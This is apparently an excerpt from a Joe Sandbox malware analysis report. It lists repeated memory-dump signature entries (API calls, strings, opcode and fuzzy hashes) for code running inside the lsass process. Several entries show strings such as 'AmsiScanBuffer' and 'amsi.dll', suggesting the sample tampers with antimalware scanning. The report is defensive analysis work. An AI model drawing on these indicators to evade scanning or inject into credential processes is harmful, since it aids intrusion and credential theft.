                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: b68fbc395b4008b8c062077b1f610ecf02756ea873cf5c8293ec7925ce342538
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: 63D19036208F8C81DA71DB1AF49439A77B0F788B94F684156EA8D87769DF3DC592CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: b487a383841d198bad61ad671097e45e90b99253259c84bcebb8eb2ffb1bb39e
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: EB51AF35209F4995FB06DF68FC913D823B1BF04744F885915A92D067AAEFB8D5ABC380
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: 27a1c99efeec3cb794feec5d7b4da393125b1e5fb9a04dfefcbd617b1c2e0317
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: C4519135209F4995EA06DB24FC903D823B1BF04744F9C8925E52D877A6EF78C99BC340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $nya-
                                            • API String ID: 756756679-1266920357
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: e44f6ab9cc7e4a7ef97263a8d5e3176e6a8d105c8800c8036b3f4b44f3aa658b
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: 8D316B32709F5987EA15DF16B9446A9A3B0BF54B84F0C4428DF8C47B56EF78C4E28740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $nya-
                                            • API String ID: 756756679-1266920357
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: 29272d6e91c5288529aca49cada390d535d8c615be63cd6586ba71387043ab1f
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: B5314A32709F5993EA56DF1AB9417A963B0BF54B84F1C4420CE8E87B56EB35C4A78700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: d555153932640f8d0347a3364c120d1ec568d657c151868c23cbfcce845ca8fc
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: B2113D31218B4842FA14673578117EA2271AF857A1F9C4624E96E967CBDEB8C4C34641
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: 0c1b4050e8ce30b04da2630d2d33d5fd89b30ba98cbf773207519ce4282eae62
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: 3311303120DB5882F6167B3578117EE61719F857A0FBC4664A86ED67CBDE38C4834200
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: 5d1b500fe26d28fa52f1e2ea028b920d62cefd2ec870b9f025740f9f7ca69692
                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: 36010535708B8886EB24DB12B85839962B1FB88FC0F8840359E9D43759DE79C9CAC7C0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: bb84f0682f540ad4f0bdb9ac2566f196a67579b3d20ff375e3b3dbbd181199c3
                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: 93010931708B4486EA24DF12B8583D963B1FB88BC0F5C41359E5D83755DE39C58B8740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: be16916117c4c5d8465fbac92c3bfb4ddd2eef5abb0f374461f5f83441254e7b
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: 1E014C75219F4882FB249B61F84879973B0BF49B45F080128DA8D073AAEF3DC0DAC780
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: ca46c63c5d18c53185b5cdb7a32bf992922f0920b67cfdb09ddb75aa79a086e2
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: AA015B74209F4882EB259F61F84939562B0BF44B81F1C0024C98D473AAEF3EC0CA8700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: 2eb15a5bc3a6d21b9791a6b655a5d988196bfcc20eedcd2072bb57e23a5e5de7
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: 09F0317230CB8992EB208F25F5943D96371FB45B88FCC41219A4D47559DE6DD6DAC700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: 549d6b3f5c5617265924b4db8807741ab2b98ea511b45a10dbd99b22b46e9c1f
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: F1F08CB4708F8982EA148B13B914199A670BF48FC0F4C8430EE4E07B1ADE6CC4C78780
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: c7a77935cd3ff50cc22bbf61a466c25b5755c83e5add7d4d4005042facc3e205
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: 18F09071208F4981EB108B24F8843A96330EF89760F5C0219DA7E455E6CF3CC4CAC7C0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: 78cd014133c63159269700181b9a36818e7f1613a5d49972043bba406d45004b
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: 09F05E7470CF8892EA048F13B9142D96370AF48FC0F5C8530EE4E47B1ACE28C4878700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: 69109c6d7863e4eb3efc4ffe6a61c66adcc268e62ce0f96a583f3346558dca83
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: 64F06D3120CF4981EA109F24F8853E92330AF897A0F9C0229DA6E465E6CF2AC48AC300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: a245ed26a221fb78eb87d517e28400a17b747c725b83cbba154e270bfc0e25b6
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: F6D0673065DF08D5EA0A6F55FC553E42271AFA4B01FDC0425C50E412A6DE2E85DFC340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction ID: 8125674789d92a5479a628aecd600cb6081226b1809075a8aed29d4977de2a50
                                            • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction Fuzzy Hash: F202B63221DB8886EB61CF55F4903AAB7B0F785794F140015EA8E87BA9DBBCD495CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction ID: 4faac7553353a4bb9109001915d92b04d98a9b0ad03f34982137517f5874144b
                                            • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction Fuzzy Hash: 1202FB3211DB8486E761CB55F49039AB7B1F7C4794F284016EA8E87BA9DF7CD496CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: 8766a97f31f53a2c0922cdae98632e9cd144d5ee2a52e1ef2e78a76bd73733b5
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: 60518335608F0587E764CB16F84079AB7B0FB84B84F5881199E4E43756DF78C98BCB80
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
